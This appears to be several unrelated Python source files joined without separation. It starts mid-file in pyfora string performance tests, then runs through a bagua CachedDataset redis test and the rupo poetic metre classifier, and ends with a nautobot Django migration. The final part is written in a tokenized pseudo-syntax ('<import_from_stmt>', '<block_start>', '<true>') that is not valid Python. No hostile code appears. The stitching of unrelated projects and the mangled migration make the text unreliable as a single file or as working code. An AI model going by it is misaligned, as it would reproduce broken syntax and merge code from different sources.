        self.evaluateWithExecutor(f, 10000, 1)

        @PerformanceTestReporter.PerfTest("pyfora.string_indexing.large_string")
        def test1():
            self.evaluateWithExecutor(f, 1000000, 100)

        @PerformanceTestReporter.PerfTest("pyfora.string_indexing.small_string")
        def test2():
            self.evaluateWithExecutor(f, 10000, 10000)

        test1()
        test2()

    def test_large_string_parsing_perf(self):
        def f(ct, passCt):
            # Parse every other single-character digit slice as an int.
            x = "1,2,3,4," * ct
            res = 0
            for _ in xrange(passCt):
                ix = 0
                while ix < len(x):
                    res = res + int(x[ix:ix + 1]) + 12341234
                    ix = ix + 2
            return res

        # Warm up, then record the measured run.
        self.evaluateWithExecutor(f, 1000000, 1)

        with PerformanceTestReporter.RecordAsPerfTest("pyfora.string_to_int"):
            self.evaluateWithExecutor(f, 1000000, 10)

    def test_string_slicing(self):
        def f(ct, passCt, chars):
            # Take a `chars`-wide slice at every position, `passCt` passes.
            x = "asdfasdf" * (ct / 8)
            res = 0
            for _ in xrange(passCt):
                for ix in xrange(len(x)):
                    res = res + len(x[ix:ix + chars])
            return res

        # Warm-up runs.
        self.evaluateWithExecutor(f, 1000000, 1, 2)
        self.evaluateWithExecutor(f, 10000, 1, 2)

        def runTest(func, name):
            # Register `func` under `name` and run it immediately.
            PerformanceTestReporter.PerfTest(name)(func)()

        runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 2),
                "pyfora.string_slicing_10mm.2_char_large_string.pyfora")
        runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 200),
                "pyfora.string_slicing_10mm.200_char_large_string.pyfora")
        runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 2),
                "pyfora.string_slicing_10mm.2_char_small_string.pyfora")
        runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 200),
                "pyfora.string_slicing_10mm.200_char_small_string.pyfora")

        # Native (pure CPython) baselines; raise the check interval so the
        # interpreter isn't interrupted mid-measurement, then restore it.
        sys.setcheckinterval(100000)
        runTest(lambda: f(1000000, 10, 2),
                "pyfora.string_slicing_10mm.2_char_large_string.native")
        runTest(lambda: f(1000000, 10, 200),
                "pyfora.string_slicing_10mm.200_char_large_string.native")
        runTest(lambda: f(10000, 1000, 2),
                "pyfora.string_slicing_10mm.2_char_small_string.native")
        runTest(lambda: f(10000, 1000, 200),
                "pyfora.string_slicing_10mm.200_char_small_string.native")
        sys.setcheckinterval(100)

    def test_string_slicing_into_vector(self):
        def testFunction(ct, passCt, chars):
            # Slice the string into a list of `chars`-wide chunks each pass.
            x = "asdfasdf" * (ct / 8)
            res = 0
            for _ in xrange(passCt):
                v = [x[ix * chars: ix * chars + chars] for ix in xrange(len(x) / chars)]
                for e in v:
                    res = res + len(e)
            return res

        f = testFunction

        # Warm-up runs.
        self.evaluateWithExecutor(f, 1000000, 1, 2)
        self.evaluateWithExecutor(f, 10000, 1, 2)

        def runTest(func, name):
            # Register `func` under `name` and run it immediately.
            PerformanceTestReporter.PerfTest(name)(func)()

        runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 2),
                "pyfora.string_slicing_into_vector_10mm.2_char_large_string.pyfora")
        runTest(lambda: self.evaluateWithExecutor(f, 1000000, 1000, 200),
                "pyfora.string_slicing_into_vector_10mm.200_char_large_string.pyfora")
        runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 2),
                "pyfora.string_slicing_into_vector_10mm.2_char_small_string.pyfora")
        runTest(lambda: self.evaluateWithExecutor(f, 10000, 100000, 200),
                "pyfora.string_slicing_into_vector_10mm.200_char_small_string.pyfora")

        # Native baselines (see test_string_slicing for the check-interval note).
        sys.setcheckinterval(100000)
        runTest(lambda: f(1000000, 10, 2),
                "pyfora.string_slicing_into_vector_10mm.2_char_large_string.native")
        runTest(lambda: f(1000000, 1000, 200),
                "pyfora.string_slicing_into_vector_10mm.200_char_large_string.native")
        runTest(lambda: f(10000, 1000, 2),
                "pyfora.string_slicing_into_vector_10mm.2_char_small_string.native")
        runTest(lambda: f(10000, 100000, 200),
                "pyfora.string_slicing_into_vector_10mm.200_char_small_string.native")
        sys.setcheckinterval(100)

    def test_string_splitlines(self):
        # test a wide variety of strings with combinations of different separators
        stringsToTest = []
        for char1 in ["", "a"]:
            stringsToTest.append(char1)
            for sep1 in ["\n", "\r", "\n\r", "\r\n", "\r\r", "\n\n", "\r\n\r"]:
                stringsToTest.append(char1 + sep1)
                for char2 in ["", "b"]:
                    stringsToTest.append(char1 + sep1 + char2)
                    for sep2 in ["\n", "\r", "\n\r", "\r\n", "\r\r", "\n\n", "\r\n\r"]:
                        stringsToTest.append(char1 + sep1 + char2 + sep2)

        def f():
            res = []
            for shouldSplit in [True, False]:
                for candidate in stringsToTest:
                    res = res + [(candidate, candidate.splitlines(shouldSplit))]
            # BUG FIX: the original omitted this return, so f() yielded None
            # and the equivalence test compared None to None (vacuous).
            return res

        self.equivalentEvaluationTest(f)

    def test_string_split(self):
        # test a wide variety of strings with combinations of different separators
        stringsToTest = ["", "a", "aa", "ab", "aba", "aaa", "bbb", "abab", "abc"]
        sepsToTest = ["a", "b"]

        def f():
            res = []
            for s in stringsToTest:
                for sep in sepsToTest:
                    res = res + [(s, sep, s.split(sep))]
            # BUG FIX: the original omitted this return, so f() yielded None
            # and the equivalence test compared None to None (vacuous).
            return res

        self.equivalentEvaluationTest(f)

    def test_string_indexing_2(self):
        def f(idx):
            x = "asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdf"
            return x[idx]

        self.equivalentEvaluationTest(f, -1)
        self.equivalentEvaluationTest(f, -2)
        self.equivalentEvaluationTest(f, 0)
        self.equivalentEvaluationTest(f, 1)

    def test_string_comparison(self):
        def f():
            a = "a"
            b = "b"
            r1 = a < b
            r2 = a > b
            return (r1, r2)

        self.equivalentEvaluationTest(f)

    def test_string_duplication(self):
        # Both str * int and int * str must work.
        def f():
            a = "asdf"
            r1 = a * 20
            r2 = 20 * a
            return (r1, r2)

        self.equivalentEvaluationTest(f)

    def test_string_equality_methods(self):
        # Covers ==, != operators and the dunder forms on equal/unequal values.
        def f():
            a = "val1"
            b = "val1"
            r1 = a == b
            r2 = a != b
            a = "val2"
            r3 = a == b
            r4 = a != b
            r5 = a.__eq__(b)
            r6 = a.__ne__(b)
            return (r1, r2, r3, r4, r5, r6)

        self.equivalentEvaluationTest(f)

    def test_large_strings(self):
        # Doubles a string until it exceeds 1MB.
        def f():
            a = "val1"
            while len(a) < 1000000:
                a = a + a
            return a

        self.equivalentEvaluationTest(f)

    def test_define_constant_string(self):
        x = "a string"
        with self.create_executor() as executor:
            define_x = executor.define(x)
            fora_x = define_x.result()
            self.assertIsNotNone(fora_x)

    def test_compute_string(self):
        def f():
            return "a string"

        remote = self.evaluateWithExecutor(f)
        self.assertEqual(f(), remote)
        self.assertTrue(isinstance(remote, str))

    def test_strings_1(self):
        def f():
            x = "asdf"
            return x

        self.equivalentEvaluationTest(f)
from bagua.torch_api.contrib.cached_dataset import CachedDataset
from torch.utils.data.dataset import Dataset
import numpy as np
import logging
import unittest

from tests import skip_if_cuda_available

logging.basicConfig(level=logging.DEBUG)


class MyDataset(Dataset):
    """A throwaway dataset of `size` random (5x2 features, 1 label) pairs."""

    def __init__(self, size):
        self.size = size
        self.dataset = [
            (np.random.rand(5, 2), np.random.rand(1)) for _idx in range(size)
        ]

    def __getitem__(self, item):
        return self.dataset[item]

    def __len__(self):
        return self.size


class TestCacheDataset(unittest.TestCase):
    """Exercises CachedDataset against a plain in-memory dataset."""

    def check_dataset(self, dataset, cache_dataset):
        """Warm the cache by iterating repeatedly, then verify every item matches."""
        # Ten full passes so every entry is served from the cache at least once.
        for _pass in range(10):
            for _item in enumerate(cache_dataset):
                pass
        # Element-wise equality of both the features and the label per index.
        for idx in range(len(dataset)):
            expected_x, expected_y = dataset[idx]
            cached_x, cached_y = cache_dataset[idx][0], cache_dataset[idx][1]
            self.assertTrue((expected_x == cached_x).all())
            self.assertTrue((expected_y == cached_y).all())

    @skip_if_cuda_available()
    def test_redis(self):
        first = MyDataset(102)
        second = MyDataset(102)
        first_cached = CachedDataset(
            first,
            backend="redis",
            dataset_name="d1",
        )
        second_cached = CachedDataset(
            second,
            backend="redis",
            dataset_name="d2",
        )
        # Start from an empty store so key counts below are exact.
        first_cached.cache_loader.store.clear()

        self.check_dataset(first, first_cached)
        # After caching the first dataset, one key per element is present.
        self.assertEqual(first_cached.cache_loader.num_keys(), len(first))

        self.check_dataset(second, second_cached)
        # Both datasets share the store, so keys accumulate across them.
        self.assertEqual(
            second_cached.cache_loader.num_keys(), len(first) + len(second)
        )


if __name__ == "__main__":
    unittest.main()
# -*- coding: utf-8 -*-
# Author: <NAME>
# Description: Metre classifier.

from collections import OrderedDict
from typing import List, Dict, Tuple
import jsonpickle
import logging

from rupo.main.markup import Line, Markup
from rupo.util.mixins import CommonMixin
from rupo.metre.pattern_analyzer import PatternAnalyzer
from rupo.util.preprocess import get_first_vowel_position
from rupo.util.timeit import timeit


class StressCorrection(CommonMixin):
    """
    A single stress correction: where in the poem a stress should be placed.
    """
    def __init__(self, line_number: int, word_number: int, syllable_number: int,
                 word_text: str, stress: int) -> None:
        """
        :param line_number: line number.
        :param word_number: word number within the line.
        :param syllable_number: syllable number within the word.
        :param word_text: text of the word.
        :param stress: stress position (0-based character offset).
        """
        self.line_number = line_number
        self.word_number = word_number
        self.syllable_number = syllable_number
        self.word_text = word_text
        self.stress = stress


class ClassificationResult(CommonMixin):
    """
    Result of classifying a poem by metre.
    """
    def __init__(self, count_lines: int=0) -> None:
        """
        :param count_lines: number of lines in the poem.
        """
        self.metre = None  # best-fitting metre name, set by classify_metre
        self.count_lines = count_lines
        self.errors_count = {k: 0 for k in MetreClassifier.metres.keys()}  # type: Dict[str, int]
        self.corrections = {k: [] for k in MetreClassifier.metres.keys()}  # type: Dict[str, List[StressCorrection]]
        self.resolutions = {k: [] for k in MetreClassifier.metres.keys()}  # type: Dict[str, List[StressCorrection]]
        self.additions = {k: [] for k in MetreClassifier.metres.keys()}  # type: Dict[str, List[StressCorrection]]

    def get_metre_errors_count(self):
        """
        :return: number of errors for the chosen metre.
        """
        return self.errors_count[self.metre]

    def to_json(self):
        """
        :return: JSON serialization of this result.
        """
        return jsonpickle.encode(self)

    @staticmethod
    def str_corrections(collection: List[StressCorrection]) -> str:
        """
        :param collection: list of corrections.
        :return: its string representation (one "(word, syllable)" pair per line).
        """
        return "\n".join([str((item.word_text, item.syllable_number)) for item in collection])

    def __str__(self):
        # NOTE: the user-facing labels below are intentionally in Russian.
        st = "Метр: " + str(self.metre) + "\n"
        st += "Снятая омография: \n" + ClassificationResult.str_corrections(self.resolutions[self.metre]) + "\n"
        st += "Неправильные ударения: \n" + ClassificationResult.str_corrections(self.corrections[self.metre]) + "\n"
        st += "Новые ударения: \n" + ClassificationResult.str_corrections(self.additions[self.metre]) + "\n"
        return st


class ErrorsTableRecord:
    """One cell of the errors table: error counts and the matched pattern for a line."""
    def __init__(self, strong_errors, weak_errors, pattern, failed=False):
        self.strong_errors = strong_errors  # count of strong (certain) errors
        self.weak_errors = weak_errors      # count of weak (tolerable) errors
        self.pattern = pattern              # pattern string matched for this line
        self.failed = failed                # True if pattern analysis failed for this line

    def __str__(self):
        return self.pattern + " " + str(self.strong_errors) + " " + str(self.weak_errors)

    def __repr__(self):
        return self.__str__()


class ErrorsTable:
    """Per-metre, per-line table of errors, with per-metre weighting coefficients."""
    def __init__(self, num_lines):
        self.data = {}
        self.num_lines = num_lines
        # Multiplicative weight applied to each metre's normalized error total.
        self.coef = OrderedDict(
            [("iambos", 0.3),
             ("choreios", 0.3),
             ("daktylos", 0.4),
             ("amphibrachys", 0.4),
             ("anapaistos", 0.4),
             ("dolnik3", 0.5),
             ("dolnik2", 0.5),
             ("taktovik3", 6.0),
             ("taktovik2", 6.0)])
        # Additive baseline penalty per metre (looser metres pay a constant cost).
        self.sum_coef = OrderedDict(
            [("iambos", 0.0),
             ("choreios", 0.0),
             ("daktylos", 0.0),
             ("amphibrachys", 0.0),
             ("anapaistos", 0.0),
             ("dolnik3", 0.035),
             ("dolnik2", 0.035),
             ("taktovik3", 0.10),
             ("taktovik2", 0.10)])
        for metre_name in MetreClassifier.metres.keys():
            self.data[metre_name] = [ErrorsTableRecord(0, 0, "") for _ in range(num_lines)]

    def add_record(self, metre_name, line_num, strong_errors, weak_errors, pattern, failed=False):
        """Store the analysis outcome for one (metre, line) cell."""
        self.data[metre_name][line_num] = ErrorsTableRecord(strong_errors, weak_errors, pattern, failed)

    def get_best_metre(self):
        """
        :return: name of the metre with the lowest weighted error score.
        """
        # Normalize each line's errors across metres (in place), so every line
        # contributes comparably regardless of its absolute error magnitude.
        for l in range(self.num_lines):
            strong_sum = 0
            weak_sum = 0
            for metre_name in self.data.keys():
                strong_sum += self.data[metre_name][l].strong_errors
                weak_sum += self.data[metre_name][l].weak_errors
            for metre_name, column in self.data.items():
                if strong_sum != 0:
                    column[l].strong_errors = column[l].strong_errors / float(strong_sum)
                if weak_sum != 0:
                    column[l].weak_errors = column[l].weak_errors / float(weak_sum)
        # Total the normalized errors per metre.
        sums = dict()
        for metre_name in self.data.keys():
            sums[metre_name] = (0, 0)
        for metre_name, column in self.data.items():
            strong_sum = 0
            weak_sum = 0
            for l in range(self.num_lines):
                strong_sum += column[l].strong_errors
                weak_sum += column[l].weak_errors
            sums[metre_name] = (strong_sum, weak_sum)
        # Weak errors count at half weight; apply per-metre coefficients and
        # baseline penalty, averaged over the number of lines.
        for metre_name, pair in sums.items():
            sums[metre_name] = self.sum_coef[metre_name] + \
                (pair[0] + pair[1] / 2.0) * self.coef[metre_name] / self.num_lines
        logging.debug(sums)
        return min(sums, key=sums.get)


class MetreClassifier(object):
    """
    Classifier that counts deviations from the standard rhythm (metre) templates.
    """
    # Pattern alphabet: s/S = stressed position, u/U = unstressed position;
    # uppercase marks the obligatory tail of the template.
    metres = OrderedDict(
        [("iambos", '(us)*(uS)(U)?(U)?'),
         ("choreios", '(su)*(S)(U)?(U)?'),
         ("daktylos", '(suu)*(S)(U)?(U)?'),
         ("amphibrachys", '(usu)*(uS)(U)?(U)?'),
         ("anapaistos", '(uus)*(uuS)(U)?(U)?'),
         ("dolnik3", '(u)?(u)?((su)(u)?)*(S)(U)?(U)?'),
         ("dolnik2", '(u)?(u)?((s)(u)?)*(S)(U)?(U)?'),
         ("taktovik3", '(u)?(u)?((su)(u)?(u)?)*(S)(U)?(U)?'),
         ("taktovik2", '(u)?(u)?((s)(u)?(u)?)*(S)(U)?(U)?')])

    # Lines longer than this many syllables are not analyzed.
    border_syllables_count = 20

    @staticmethod
    @timeit
    def classify_metre(markup):
        """
        Classify the poetic metre.

        :param markup: the markup (rupo Markup).
        :return: ClassificationResult with the chosen metre and all corrections.
        """
        result = ClassificationResult(len(markup.lines))
        num_lines = len(markup.lines)
        errors_table = ErrorsTable(num_lines)
        for l, line in enumerate(markup.lines):
            for metre_name, metre_pattern in MetreClassifier.metres.items():
                line_syllables_count = sum([len(word.syllables) for word in line.words])
                # Skip lines longer than border_syllables_count syllables, or empty ones.
                if line_syllables_count > MetreClassifier.border_syllables_count or line_syllables_count == 0:
                    continue
                # Looser metres get a tighter error budget.
                error_border = 7
                if metre_name == "dolnik2" or metre_name == "dolnik3":
                    error_border = 3
                if metre_name == "taktovik2" or metre_name == "taktovik3":
                    error_border = 2
                pattern, strong_errors, weak_errors, analysis_errored = \
                    PatternAnalyzer.count_errors(MetreClassifier.metres[metre_name],
                                                 MetreClassifier.__get_line_pattern(line),
                                                 error_border)
                if analysis_errored or len(pattern) == 0:
                    # Record the failure so this line is excluded from corrections later.
                    errors_table.add_record(metre_name, l, strong_errors, weak_errors, pattern, True)
                    continue
                # Accentuation mismatches count as additional strong errors.
                corrections = MetreClassifier.__get_line_pattern_matching_corrections(line, l, pattern)[0]
                accentuation_errors = len(corrections)
                strong_errors += accentuation_errors
                errors_table.add_record(metre_name, l, strong_errors, weak_errors, pattern)
        result.metre = errors_table.get_best_metre()
        # Remember all corrections for the winning metre.
        for l, line in enumerate(markup.lines):
            pattern = errors_table.data[result.metre][l].pattern
            failed = errors_table.data[result.metre][l].failed
            if failed or len(pattern) == 0:
                continue
            corrections, resolutions, additions = \
                MetreClassifier.__get_line_pattern_matching_corrections(line, l, pattern)
            result.corrections[result.metre] += corrections
            result.resolutions[result.metre] += resolutions
            result.additions[result.metre] += additions
            result.errors_count[result.metre] += len(corrections)
        return result

    @staticmethod
    def __get_line_pattern(line: Line) -> str:
        """
        Render a line as a stress pattern string.

        :param line: the line.
        :return: pattern of "S" (stressed) / "U" (unstressed) per syllable;
                 a word with no syllables contributes a single "U".
        """
        pattern = ""
        for w, word in enumerate(line.words):
            if len(word.syllables) == 0:
                pattern += "U"
            else:
                for syllable in word.syllables:
                    if syllable.stress != -1:
                        pattern += "S"
                    else:
                        pattern += "U"
        return pattern

    @staticmethod
    def __get_line_pattern_matching_corrections(line: Line, line_number: int, pattern: str) \
            -> Tuple[List[StressCorrection], List[StressCorrection], List[StressCorrection]]:
        """
        A stress may fall on a weak position as long as an unstressed syllable of
        the same word does not occupy an ictus; otherwise it is an error.

        :param line: the line.
        :param line_number: line number.
        :param pattern: the matched pattern for this line.
        :return: (corrections, resolutions, additions).
        """
        corrections = []
        resolutions = []
        additions = []
        number_in_pattern = 0
        for w, word in enumerate(line.words):
            # Words without syllables are ignored entirely.
            if len(word.syllables) == 0:
                continue
            # Monosyllabic word: only suggest a stress when the pattern demands one.
            if len(word.syllables) == 1:
                if pattern[number_in_pattern].lower() == "s" and word.syllables[0].stress == -1:
                    additions.append(StressCorrection(line_number, w, 0, word.text, word.syllables[0].vowel()))
                number_in_pattern += len(word.syllables)
                continue
            stress_count = word.count_stresses()
            for syllable in word.syllables:
                if stress_count == 0 and pattern[number_in_pattern].lower() == "s":
                    # No stresses at all: place whichever fits the metre. There may be several.
                    additions.append(StressCorrection(line_number, w, syllable.number, word.text, syllable.vowel()))
                elif pattern[number_in_pattern].lower() == "u" and syllable.stress != -1:
                    # A stress falls on this syllable while the pattern expects it unstressed.
                    # Find a syllable of the same word whose pattern position is stressed —
                    # that is our correction.
                    for other_syllable in word.syllables:
                        other_number_in_pattern = other_syllable.number - syllable.number + number_in_pattern
                        if syllable.number == other_syllable.number or pattern[other_number_in_pattern].lower() != "s":
                            continue
                        ac = StressCorrection(line_number, w, other_syllable.number, word.text, other_syllable.vowel())
                        if stress_count == 1 and other_syllable.stress == -1:
                            corrections.append(ac)
                        else:
                            # Word already has a valid stress option: this is
                            # homography resolution rather than a correction.
                            resolutions.append(ac)
                number_in_pattern += 1
        return corrections, resolutions, additions

    @staticmethod
    def get_improved_markup(markup: Markup, result: ClassificationResult) -> Markup:
        """
        Improve the markup (in place) after metre classification.

        :param markup: the initial markup.
        :param result: the classification result.
        :return: the improved markup (same object, mutated).
        """
        # Corrections/resolutions: clear all stresses in the word, then set the
        # one syllable the correction points at.
        for pos in result.corrections[result.metre] + result.resolutions[result.metre]:
            syllables = markup.lines[pos.line_number].words[pos.word_number].syllables
            for i, syllable in enumerate(syllables):
                syllable.stress = -1
                if syllable.number == pos.syllable_number:
                    syllable.stress = syllable.begin + get_first_vowel_position(syllable.text)
        # Additions: only set the new stress; existing stresses are untouched.
        for pos in result.additions[result.metre]:
            syllable = markup.lines[pos.line_number].words[pos.word_number].syllables[pos.syllable_number]
            syllable.stress = syllable.begin + get_first_vowel_position(syllable.text)
        return markup

    @staticmethod
    def improve_markup(markup: Markup) -> Tuple[Markup, ClassificationResult]:
        """
        Improve a markup with the metre classifier: classify, then apply corrections.

        :param markup: the initial markup.
        :return: (improved markup, classification result).
        """
        result = MetreClassifier.classify_metre(markup)
        improved_markup = MetreClassifier.get_improved_markup(markup, result)
        return improved_markup, result
# Generated by Django 3.1.7 on 2021-04-01 06:35 <import_from_stmt>django.conf settings<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<import_stmt>mptt.fields<import_stmt>nautobot.extras.models.statuses<import_stmt>taggit.managers<class_stmt>Migration(migrations.Migration)<block_start>initial=<true><line_sep>dependencies=[("contenttypes" "0002_remove_content_type_name") migrations.swappable_dependency(settings.AUTH_USER_MODEL) ("tenancy" "0001_initial") ("extras" "0001_initial_part_1") ("dcim" "0002_initial_part_2") ("ipam" "0001_initial_part_1") ]<line_sep>operations=[migrations.AddField(model_name="rackreservation" name="user" field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT to=settings.AUTH_USER_MODEL) ) migrations.AddField(model_name="rackgroup" name="parent" field=mptt.fields.TreeForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name="children" to="dcim.rackgroup" ) ) migrations.AddField(model_name="rackgroup" name="site" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="rack_groups" to="dcim.site") ) migrations.AddField(model_name="rack" name="group" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="racks" to="dcim.rackgroup" ) ) migrations.AddField(model_name="rack" name="role" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT related_name="racks" to="dcim.rackrole" ) ) migrations.AddField(model_name="rack" name="site" field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT related_name="racks" to="dcim.site") ) migrations.AddField(model_name="rack" name="status" field=nautobot.extras.models.statuses.StatusField(null=<true> on_delete=django.db.models.deletion.PROTECT related_name="dcim_rack_related" to="extras.status" ) ) migrations.AddField(model_name="rack" name="tags" 
field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="rack" name="tenant" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT related_name="racks" to="tenancy.tenant" ) ) migrations.AddField(model_name="powerporttemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="powerporttemplates" to="dcim.devicetype") ) migrations.AddField(model_name="powerport" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="contenttypes.contenttype" ) ) migrations.AddField(model_name="powerport" name="_path" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL to="dcim.cablepath") ) migrations.AddField(model_name="powerport" name="cable" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="powerport" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="powerports" to="dcim.device") ) migrations.AddField(model_name="powerport" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="powerpanel" name="rack_group" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT to="dcim.rackgroup") ) migrations.AddField(model_name="powerpanel" name="site" field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT to="dcim.site") ) migrations.AddField(model_name="powerpanel" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="poweroutlettemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="poweroutlettemplates" 
to="dcim.devicetype") ) migrations.AddField(model_name="poweroutlettemplate" name="power_port" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="poweroutlet_templates" to="dcim.powerporttemplate" ) ) migrations.AddField(model_name="poweroutlet" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="contenttypes.contenttype" ) ) migrations.AddField(model_name="poweroutlet" name="_path" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL to="dcim.cablepath") ) migrations.AddField(model_name="poweroutlet" name="cable" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="poweroutlet" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="poweroutlets" to="dcim.device") ) migrations.AddField(model_name="poweroutlet" name="power_port" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="poweroutlets" to="dcim.powerport" ) ) migrations.AddField(model_name="poweroutlet" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="powerfeed" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="contenttypes.contenttype" ) ) migrations.AddField(model_name="powerfeed" name="_path" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL to="dcim.cablepath") ) migrations.AddField(model_name="powerfeed" name="cable" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="powerfeed" name="power_panel" 
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT related_name="powerfeeds" to="dcim.powerpanel") ) migrations.AddField(model_name="powerfeed" name="rack" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT to="dcim.rack") ) migrations.AddField(model_name="powerfeed" name="status" field=nautobot.extras.models.statuses.StatusField(null=<true> on_delete=django.db.models.deletion.PROTECT related_name="dcim_powerfeed_related" to="extras.status" ) ) migrations.AddField(model_name="powerfeed" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="platform" name="manufacturer" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT related_name="platforms" to="dcim.manufacturer" ) ) migrations.AddField(model_name="inventoryitem" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="inventoryitems" to="dcim.device") ) migrations.AddField(model_name="inventoryitem" name="manufacturer" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT related_name="inventory_items" to="dcim.manufacturer" ) ) migrations.AddField(model_name="inventoryitem" name="parent" field=mptt.fields.TreeForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name="child_items" to="dcim.inventoryitem" ) ) migrations.AddField(model_name="inventoryitem" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="interfacetemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="interfacetemplates" to="dcim.devicetype") ) migrations.AddField(model_name="interface" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" 
to="contenttypes.contenttype" ) ) migrations.AddField(model_name="interface" name="_path" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL to="dcim.cablepath") ) migrations.AddField(model_name="interface" name="cable" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="interface" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="interfaces" to="dcim.device") ) migrations.AddField(model_name="interface" name="lag" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="member_interfaces" to="dcim.interface" ) ) migrations.AddField(model_name="interface" name="tagged_vlans" field=models.ManyToManyField(blank=<true> related_name="interfaces_as_tagged" to="ipam.VLAN") ) migrations.AddField(model_name="interface" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="interface" name="untagged_vlan" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="interfaces_as_untagged" to="ipam.vlan" ) ) migrations.AddField(model_name="frontporttemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="frontporttemplates" to="dcim.devicetype") ) migrations.AddField(model_name="frontporttemplate" name="rear_port" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="frontport_templates" to="dcim.rearporttemplate" ) ) migrations.AddField(model_name="frontport" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="contenttypes.contenttype" ) ) migrations.AddField(model_name="frontport" name="cable" field=models.ForeignKey(blank=<true> null=<true> 
on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="frontport" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="frontports" to="dcim.device") ) migrations.AddField(model_name="frontport" name="rear_port" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="frontports" to="dcim.rearport") ) migrations.AddField(model_name="frontport" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="devicetype" name="manufacturer" field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT related_name="device_types" to="dcim.manufacturer") ) migrations.AddField(model_name="devicetype" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="devicebaytemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="devicebaytemplates" to="dcim.devicetype") ) migrations.AddField(model_name="devicebay" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="devicebays" to="dcim.device") ) migrations.AddField(model_name="devicebay" name="installed_device" field=models.OneToOneField(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="parent_bay" to="dcim.device" ) ) 